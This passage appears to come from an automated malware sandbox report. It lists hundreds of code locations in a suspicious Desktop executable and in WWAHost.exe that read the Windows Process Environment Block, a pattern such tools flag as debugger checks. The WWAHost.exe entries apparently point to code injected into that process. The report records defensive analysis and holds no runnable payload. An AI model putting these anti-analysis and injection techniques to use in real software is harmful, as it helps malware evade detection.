Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01200EA5 mov eax, dword ptr fs:[00000030h]	1_2_01200EA5
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01200EA5 mov eax, dword ptr fs:[00000030h]	1_2_01200EA5
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01200EA5 mov eax, dword ptr fs:[00000030h]	1_2_01200EA5
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011CFE87 mov eax, dword ptr fs:[00000030h]	1_2_011CFE87
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011B46A7 mov eax, dword ptr fs:[00000030h]	1_2_011B46A7
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01178EC7 mov eax, dword ptr fs:[00000030h]	1_2_01178EC7
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011636CC mov eax, dword ptr fs:[00000030h]	1_2_011636CC
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011EFEC0 mov eax, dword ptr fs:[00000030h]	1_2_011EFEC0
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01208ED6 mov eax, dword ptr fs:[00000030h]	1_2_01208ED6
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011616E0 mov ecx, dword ptr fs:[00000030h]	1_2_011616E0
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011476E2 mov eax, dword ptr fs:[00000030h]	1_2_011476E2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0317F716 mov eax, dword ptr fs:[00000030h]	6_2_0317F716
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031EFF10 mov eax, dword ptr fs:[00000030h]	6_2_031EFF10
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031EFF10 mov eax, dword ptr fs:[00000030h]	6_2_031EFF10
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0318A70E mov eax, dword ptr fs:[00000030h]	6_2_0318A70E
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0318A70E mov eax, dword ptr fs:[00000030h]	6_2_0318A70E
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0318E730 mov eax, dword ptr fs:[00000030h]	6_2_0318E730
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0322070D mov eax, dword ptr fs:[00000030h]	6_2_0322070D
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0322070D mov eax, dword ptr fs:[00000030h]	6_2_0322070D
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0321131B mov eax, dword ptr fs:[00000030h]	6_2_0321131B
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03154F2E mov eax, dword ptr fs:[00000030h]	6_2_03154F2E
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03154F2E mov eax, dword ptr fs:[00000030h]	6_2_03154F2E
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03228F6A mov eax, dword ptr fs:[00000030h]	6_2_03228F6A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0315F358 mov eax, dword ptr fs:[00000030h]	6_2_0315F358
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0315DB40 mov eax, dword ptr fs:[00000030h]	6_2_0315DB40
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0316EF40 mov eax, dword ptr fs:[00000030h]	6_2_0316EF40
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03183B7A mov eax, dword ptr fs:[00000030h]	6_2_03183B7A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03183B7A mov eax, dword ptr fs:[00000030h]	6_2_03183B7A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0315DB60 mov ecx, dword ptr fs:[00000030h]	6_2_0315DB60
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0316FF60 mov eax, dword ptr fs:[00000030h]	6_2_0316FF60
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03228B58 mov eax, dword ptr fs:[00000030h]	6_2_03228B58
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03168794 mov eax, dword ptr fs:[00000030h]	6_2_03168794
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03225BA5 mov eax, dword ptr fs:[00000030h]	6_2_03225BA5
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0318B390 mov eax, dword ptr fs:[00000030h]	6_2_0318B390
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031D7794 mov eax, dword ptr fs:[00000030h]	6_2_031D7794
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031D7794 mov eax, dword ptr fs:[00000030h]	6_2_031D7794
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031D7794 mov eax, dword ptr fs:[00000030h]	6_2_031D7794
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03182397 mov eax, dword ptr fs:[00000030h]	6_2_03182397
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03161B8F mov eax, dword ptr fs:[00000030h]	6_2_03161B8F
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03161B8F mov eax, dword ptr fs:[00000030h]	6_2_03161B8F
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0320D380 mov ecx, dword ptr fs:[00000030h]	6_2_0320D380
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0321138A mov eax, dword ptr fs:[00000030h]	6_2_0321138A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03184BAD mov eax, dword ptr fs:[00000030h]	6_2_03184BAD
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03184BAD mov eax, dword ptr fs:[00000030h]	6_2_03184BAD
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03184BAD mov eax, dword ptr fs:[00000030h]	6_2_03184BAD
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031D53CA mov eax, dword ptr fs:[00000030h]	6_2_031D53CA
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031D53CA mov eax, dword ptr fs:[00000030h]	6_2_031D53CA
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031937F5 mov eax, dword ptr fs:[00000030h]	6_2_031937F5
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031803E2 mov eax, dword ptr fs:[00000030h]	6_2_031803E2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031803E2 mov eax, dword ptr fs:[00000030h]	6_2_031803E2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031803E2 mov eax, dword ptr fs:[00000030h]	6_2_031803E2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031803E2 mov eax, dword ptr fs:[00000030h]	6_2_031803E2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031803E2 mov eax, dword ptr fs:[00000030h]	6_2_031803E2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031803E2 mov eax, dword ptr fs:[00000030h]	6_2_031803E2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0317DBE9 mov eax, dword ptr fs:[00000030h]	6_2_0317DBE9
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0315AA16 mov eax, dword ptr fs:[00000030h]	6_2_0315AA16
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0315AA16 mov eax, dword ptr fs:[00000030h]	6_2_0315AA16
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0318A61C mov eax, dword ptr fs:[00000030h]	6_2_0318A61C
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0318A61C mov eax, dword ptr fs:[00000030h]	6_2_0318A61C
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03155210 mov eax, dword ptr fs:[00000030h]	6_2_03155210
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03155210 mov ecx, dword ptr fs:[00000030h]	6_2_03155210
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03155210 mov eax, dword ptr fs:[00000030h]	6_2_03155210
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03155210 mov eax, dword ptr fs:[00000030h]	6_2_03155210
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03173A1C mov eax, dword ptr fs:[00000030h]	6_2_03173A1C
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0315C600 mov eax, dword ptr fs:[00000030h]	6_2_0315C600
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0315C600 mov eax, dword ptr fs:[00000030h]	6_2_0315C600
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0315C600 mov eax, dword ptr fs:[00000030h]	6_2_0315C600
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03188E00 mov eax, dword ptr fs:[00000030h]	6_2_03188E00
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03168A0A mov eax, dword ptr fs:[00000030h]	6_2_03168A0A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0320FE3F mov eax, dword ptr fs:[00000030h]	6_2_0320FE3F
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03211608 mov eax, dword ptr fs:[00000030h]	6_2_03211608
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0315E620 mov eax, dword ptr fs:[00000030h]	6_2_0315E620
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03194A2C mov eax, dword ptr fs:[00000030h]	6_2_03194A2C
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03194A2C mov eax, dword ptr fs:[00000030h]	6_2_03194A2C
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0320B260 mov eax, dword ptr fs:[00000030h]	6_2_0320B260
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0320B260 mov eax, dword ptr fs:[00000030h]	6_2_0320B260
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03228A62 mov eax, dword ptr fs:[00000030h]	6_2_03228A62
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031E4257 mov eax, dword ptr fs:[00000030h]	6_2_031E4257
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03159240 mov eax, dword ptr fs:[00000030h]	6_2_03159240
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03159240 mov eax, dword ptr fs:[00000030h]	6_2_03159240
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03159240 mov eax, dword ptr fs:[00000030h]	6_2_03159240
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03159240 mov eax, dword ptr fs:[00000030h]	6_2_03159240
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03167E41 mov eax, dword ptr fs:[00000030h]	6_2_03167E41
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03167E41 mov eax, dword ptr fs:[00000030h]	6_2_03167E41
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03167E41 mov eax, dword ptr fs:[00000030h]	6_2_03167E41
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03167E41 mov eax, dword ptr fs:[00000030h]	6_2_03167E41
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03167E41 mov eax, dword ptr fs:[00000030h]	6_2_03167E41
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03167E41 mov eax, dword ptr fs:[00000030h]	6_2_03167E41
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0319927A mov eax, dword ptr fs:[00000030h]	6_2_0319927A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0317AE73 mov eax, dword ptr fs:[00000030h]	6_2_0317AE73
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0317AE73 mov eax, dword ptr fs:[00000030h]	6_2_0317AE73
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0317AE73 mov eax, dword ptr fs:[00000030h]	6_2_0317AE73
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0317AE73 mov eax, dword ptr fs:[00000030h]	6_2_0317AE73
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0317AE73 mov eax, dword ptr fs:[00000030h]	6_2_0317AE73
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0321AE44 mov eax, dword ptr fs:[00000030h]	6_2_0321AE44
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0321AE44 mov eax, dword ptr fs:[00000030h]	6_2_0321AE44
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0321EA55 mov eax, dword ptr fs:[00000030h]	6_2_0321EA55
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0316766D mov eax, dword ptr fs:[00000030h]	6_2_0316766D
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03220EA5 mov eax, dword ptr fs:[00000030h]	6_2_03220EA5
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03220EA5 mov eax, dword ptr fs:[00000030h]	6_2_03220EA5
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03220EA5 mov eax, dword ptr fs:[00000030h]	6_2_03220EA5
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0318D294 mov eax, dword ptr fs:[00000030h]	6_2_0318D294
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0318D294 mov eax, dword ptr fs:[00000030h]	6_2_0318D294
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031EFE87 mov eax, dword ptr fs:[00000030h]	6_2_031EFE87
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0316AAB0 mov eax, dword ptr fs:[00000030h]	6_2_0316AAB0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0316AAB0 mov eax, dword ptr fs:[00000030h]	6_2_0316AAB0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0318FAB0 mov eax, dword ptr fs:[00000030h]	6_2_0318FAB0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031552A5 mov eax, dword ptr fs:[00000030h]	6_2_031552A5
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031552A5 mov eax, dword ptr fs:[00000030h]	6_2_031552A5
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031552A5 mov eax, dword ptr fs:[00000030h]	6_2_031552A5
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031552A5 mov eax, dword ptr fs:[00000030h]	6_2_031552A5
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031552A5 mov eax, dword ptr fs:[00000030h]	6_2_031552A5
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031D46A7 mov eax, dword ptr fs:[00000030h]	6_2_031D46A7
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03182ACB mov eax, dword ptr fs:[00000030h]	6_2_03182ACB
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031836CC mov eax, dword ptr fs:[00000030h]	6_2_031836CC
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03198EC7 mov eax, dword ptr fs:[00000030h]	6_2_03198EC7
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0320FEC0 mov eax, dword ptr fs:[00000030h]	6_2_0320FEC0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03228ED6 mov eax, dword ptr fs:[00000030h]	6_2_03228ED6
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031676E2 mov eax, dword ptr fs:[00000030h]	6_2_031676E2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031816E0 mov ecx, dword ptr fs:[00000030h]	6_2_031816E0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03182AE4 mov eax, dword ptr fs:[00000030h]	6_2_03182AE4
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03159100 mov eax, dword ptr fs:[00000030h]	6_2_03159100
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03159100 mov eax, dword ptr fs:[00000030h]	6_2_03159100
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03159100 mov eax, dword ptr fs:[00000030h]	6_2_03159100
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03228D34 mov eax, dword ptr fs:[00000030h]	6_2_03228D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0321E539 mov eax, dword ptr fs:[00000030h]	6_2_0321E539
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0318513A mov eax, dword ptr fs:[00000030h]	6_2_0318513A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0318513A mov eax, dword ptr fs:[00000030h]	6_2_0318513A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03163D34 mov eax, dword ptr fs:[00000030h]	6_2_03163D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03163D34 mov eax, dword ptr fs:[00000030h]	6_2_03163D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03163D34 mov eax, dword ptr fs:[00000030h]	6_2_03163D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03163D34 mov eax, dword ptr fs:[00000030h]	6_2_03163D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03163D34 mov eax, dword ptr fs:[00000030h]	6_2_03163D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03163D34 mov eax, dword ptr fs:[00000030h]	6_2_03163D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03163D34 mov eax, dword ptr fs:[00000030h]	6_2_03163D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03163D34 mov eax, dword ptr fs:[00000030h]	6_2_03163D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03163D34 mov eax, dword ptr fs:[00000030h]	6_2_03163D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03163D34 mov eax, dword ptr fs:[00000030h]	6_2_03163D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03163D34 mov eax, dword ptr fs:[00000030h]	6_2_03163D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03163D34 mov eax, dword ptr fs:[00000030h]	6_2_03163D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03163D34 mov eax, dword ptr fs:[00000030h]	6_2_03163D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03184D3B mov eax, dword ptr fs:[00000030h]	6_2_03184D3B
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03184D3B mov eax, dword ptr fs:[00000030h]	6_2_03184D3B
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03184D3B mov eax, dword ptr fs:[00000030h]	6_2_03184D3B
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0315AD30 mov eax, dword ptr fs:[00000030h]	6_2_0315AD30
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031DA537 mov eax, dword ptr fs:[00000030h]	6_2_031DA537
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03174120 mov eax, dword ptr fs:[00000030h]	6_2_03174120
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03174120 mov eax, dword ptr fs:[00000030h]	6_2_03174120
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03174120 mov eax, dword ptr fs:[00000030h]	6_2_03174120
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03174120 mov eax, dword ptr fs:[00000030h]	6_2_03174120
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03174120 mov ecx, dword ptr fs:[00000030h]	6_2_03174120
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03177D50 mov eax, dword ptr fs:[00000030h]	6_2_03177D50
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0317B944 mov eax, dword ptr fs:[00000030h]	6_2_0317B944
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0317B944 mov eax, dword ptr fs:[00000030h]	6_2_0317B944
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03193D43 mov eax, dword ptr fs:[00000030h]	6_2_03193D43
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031D3540 mov eax, dword ptr fs:[00000030h]	6_2_031D3540
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0317C577 mov eax, dword ptr fs:[00000030h]	6_2_0317C577
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0317C577 mov eax, dword ptr fs:[00000030h]	6_2_0317C577
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0315B171 mov eax, dword ptr fs:[00000030h]	6_2_0315B171
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0315B171 mov eax, dword ptr fs:[00000030h]	6_2_0315B171
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0315C962 mov eax, dword ptr fs:[00000030h]	6_2_0315C962
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0318FD9B mov eax, dword ptr fs:[00000030h]	6_2_0318FD9B
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0318FD9B mov eax, dword ptr fs:[00000030h]	6_2_0318FD9B
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03182990 mov eax, dword ptr fs:[00000030h]	6_2_03182990
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_032205AC mov eax, dword ptr fs:[00000030h]	6_2_032205AC
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_032205AC mov eax, dword ptr fs:[00000030h]	6_2_032205AC
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0317C182 mov eax, dword ptr fs:[00000030h]	6_2_0317C182
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03182581 mov eax, dword ptr fs:[00000030h]	6_2_03182581
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03182581 mov eax, dword ptr fs:[00000030h]	6_2_03182581
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03182581 mov eax, dword ptr fs:[00000030h]	6_2_03182581
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03182581 mov eax, dword ptr fs:[00000030h]	6_2_03182581
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0318A185 mov eax, dword ptr fs:[00000030h]	6_2_0318A185
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03152D8A mov eax, dword ptr fs:[00000030h]	6_2_03152D8A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03152D8A mov eax, dword ptr fs:[00000030h]	6_2_03152D8A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03152D8A mov eax, dword ptr fs:[00000030h]	6_2_03152D8A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03152D8A mov eax, dword ptr fs:[00000030h]	6_2_03152D8A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03152D8A mov eax, dword ptr fs:[00000030h]	6_2_03152D8A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031D51BE mov eax, dword ptr fs:[00000030h]	6_2_031D51BE
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031D51BE mov eax, dword ptr fs:[00000030h]	6_2_031D51BE
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031D51BE mov eax, dword ptr fs:[00000030h]	6_2_031D51BE
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031D51BE mov eax, dword ptr fs:[00000030h]	6_2_031D51BE
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03181DB5 mov eax, dword ptr fs:[00000030h]	6_2_03181DB5
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03181DB5 mov eax, dword ptr fs:[00000030h]	6_2_03181DB5
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03181DB5 mov eax, dword ptr fs:[00000030h]	6_2_03181DB5
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031861A0 mov eax, dword ptr fs:[00000030h]	6_2_031861A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031861A0 mov eax, dword ptr fs:[00000030h]	6_2_031861A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031835A1 mov eax, dword ptr fs:[00000030h]	6_2_031835A1
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031D69A6 mov eax, dword ptr fs:[00000030h]	6_2_031D69A6
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0321FDE2 mov eax, dword ptr fs:[00000030h]	6_2_0321FDE2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0321FDE2 mov eax, dword ptr fs:[00000030h]	6_2_0321FDE2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0321FDE2 mov eax, dword ptr fs:[00000030h]	6_2_0321FDE2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0321FDE2 mov eax, dword ptr fs:[00000030h]	6_2_0321FDE2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03208DF1 mov eax, dword ptr fs:[00000030h]	6_2_03208DF1
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031D6DC9 mov eax, dword ptr fs:[00000030h]	6_2_031D6DC9
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031D6DC9 mov eax, dword ptr fs:[00000030h]	6_2_031D6DC9
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031D6DC9 mov eax, dword ptr fs:[00000030h]	6_2_031D6DC9
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031D6DC9 mov ecx, dword ptr fs:[00000030h]	6_2_031D6DC9
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031D6DC9 mov eax, dword ptr fs:[00000030h]	6_2_031D6DC9
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031D6DC9 mov eax, dword ptr fs:[00000030h]	6_2_031D6DC9
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0315B1E1 mov eax, dword ptr fs:[00000030h]	6_2_0315B1E1
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0315B1E1 mov eax, dword ptr fs:[00000030h]	6_2_0315B1E1
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0315B1E1 mov eax, dword ptr fs:[00000030h]	6_2_0315B1E1
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031E41E8 mov eax, dword ptr fs:[00000030h]	6_2_031E41E8
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0316D5E0 mov eax, dword ptr fs:[00000030h]	6_2_0316D5E0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0316D5E0 mov eax, dword ptr fs:[00000030h]	6_2_0316D5E0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031D7016 mov eax, dword ptr fs:[00000030h]	6_2_031D7016
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031D7016 mov eax, dword ptr fs:[00000030h]	6_2_031D7016
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031D7016 mov eax, dword ptr fs:[00000030h]	6_2_031D7016
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031D6C0A mov eax, dword ptr fs:[00000030h]	6_2_031D6C0A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031D6C0A mov eax, dword ptr fs:[00000030h]	6_2_031D6C0A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031D6C0A mov eax, dword ptr fs:[00000030h]	6_2_031D6C0A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031D6C0A mov eax, dword ptr fs:[00000030h]	6_2_031D6C0A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03211C06 mov eax, dword ptr fs:[00000030h]	6_2_03211C06
